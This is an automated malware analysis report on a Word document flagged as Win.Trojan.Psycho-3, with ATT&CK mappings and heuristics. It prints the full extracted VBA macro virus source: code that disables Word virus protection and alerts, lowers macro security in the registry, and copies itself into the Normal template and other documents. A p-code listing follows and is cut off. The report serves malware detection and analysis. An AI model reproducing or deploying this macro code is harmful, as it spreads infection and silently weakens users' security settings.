Verdict: MALICIOUS
Risk Score: 120

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a Microsoft Word document containing VBA macros, including a Document_Open macro, a common technique for running code as soon as the document is opened. The macro writes a temporary file to the system TEMP directory and then uses it to inject code into the VBA project. The ClamAV detection Win.Trojan.Psycho-3 further supports the malicious verdict. The macro's obfuscation and randomised file naming make precise IOC extraction difficult, but the temporary file path pattern is identified.
Heuristics (3)
- ClamAV: Win.Trojan.Psycho-3 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.Psycho-3
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5804 bytes |

SHA-256: 3bf3ef92f4135de364537ea1c66a0118204ba6692916c9a1bcf813530c658054
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'Copyright (C) 1998 by FlyShadow ~^^~ - Shadow
Private Sub Document_Open()
On Error Resume Next
Options.VirusProtection = (0)
Options.SaveNormalPrompt = (0)
Application.DisplayAlerts = (0)
Application.ScreenUpdating = (0)
Application.EnableCancelKey = (0)
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
γ = System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "SystemRoot") & ".\TEMP\"
Do While FileLen(γ & System.ProfileString("", "DefaultFileName")) = 0
Randomize: α = "~WR00000.TMP"
Mid(α, 4, 1) = Chr(Int((26 * Rnd) + 65))
Mid(α, 8, 1) = Int(Rnd() * 10)
VBProject.VBComponents(1).Export (γ & α)
Open γ & α For Input As #1
For η = 1 To 4: Line Input #1, �: Next: η = ""
Do Until ι = "'�"
Line Input #1, ι
η = η & ι & Chr(13) & Chr(10)
Loop: Close #1
Open γ & α For Output As #1: Print #1, η: Close #1
System.ProfileString("", "DefaultFileName") = α: Loop
Set α = IIf(MacroContainer <> NormalTemplate, NormalTemplate, ActiveDocument).VBProject.VBComponents(1)
If α.CodeModule.CountOfLines > 0 Or ActiveDocument.Path = "" Then Exit Sub
α.CodeModule.AddFromFile γ & System.ProfileString("", "DefaultFileName")
α.CodeModule.Replaceline 2, "Private Sub " & IIf(MacroContainer <> NormalTemplate, "Document_Open()", "Document_Close()")
End Sub
'�
' Processing file: /opt/analyzer/scan_staging/348bfa2dfb20438fb73a088c1cdb0275.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 3547 bytes
' Line #0:
' QuoteRem 0x0000 0x002D "Copyright (C) 1998 by FlyShadow ~^^~ - Shadow"
' Line #1:
' FuncDefn (Private Sub Document_Open())
' Line #2:
' OnError (Resume Next)
' Line #3:
' LitDI2 0x0000
' Paren
' Ld Options
' MemSt VirusProtection
' Line #4:
' LitDI2 0x0000
' Paren
' Ld Options
' MemSt SaveNormalPrompt
' Line #5:
' LitDI2 0x0000
' Paren
' Ld Application
' MemSt DisplayAlerts
' Line #6:
' LitDI2 0x0000
' Paren
' Ld Application
' MemSt ScreenUpdating
' Line #7:
' LitDI2 0x0000
' Paren
' Ld Application
' MemSt EnableCancelKey
' Line #8:
' LitDI4 0x0001 0x0000
' LitStr 0x0000 ""
' LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security"
' LitStr 0x0005 "Level"
' Ld System
' ArgsMemSt PrivateProfileString 0x0003
' Line #9:
' LitStr 0x0000 ""
' LitStr 0x003C "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion"
' LitStr 0x000A "SystemRoot"
' Ld System
' ArgsMemLd PrivateProfileString 0x0003
' LitStr 0x0007 ".\TEMP\"
' Concat
' St γ
' Line #10:
' Ld γ
' LitStr 0x0000 ""
' LitStr 0x000F "DefaultFileName"
' Ld System
' ArgsMemLd ProfileString 0x0002
' Concat
' ArgsLd FileLen 0x0001
' LitDI2 0x0000
' Eq
' DoWhile
' Line #11:
' ArgsCall Read 0x0000
' BoS 0x0000
' LitStr 0x000C "~WR00000.TMP"
' St α
' Line #12:
' LitDI2 0x001A
' Ld Rnd
' Mul
' Paren
' LitDI2 0x0041
' Add
' FnInt
' ArgsLd Chr 0x0001
' Ld α
' LitDI2 0x0004
' LitDI2 0x0001
' Mid
' Line #13:
' ArgsLd Rnd 0x0000
' LitDI2 0x000A
' Mul
' FnInt
' Ld α
' LitDI2 0x0008
' LitDI2 0x0001
' Mid
' Line #14:
' Ld γ
' Ld α
' Concat
' Paren
' LitDI2 0x0001
' Ld VBProject
' ArgsMemLd VBComponents 0x0001
' ArgsMemCall Export 0x0001
' Line #15:
' Ld γ
' Ld α
' Concat
' LitDI2 0x0001
' Sharp
' LitDefault
' Open (For Input)
' Line #16:
' StartForVariable
' Ld η
' EndForVariable
' LitDI2 0x0001
' LitDI2 0x0004
' For
' BoS 0x0000
' LitDI2 0x0001
' Ld �
' LineInput
' BoS 0x0000
' StartForVariable
' Next
' BoS 0x0000
' LitStr 0x0000 ""
' St η
' Line #17:
' Ld ι
' LitStr 0x0002 "'�"
' Eq
' DoUnitil
' Line #18:
' LitDI2 0x00
... (truncated)
```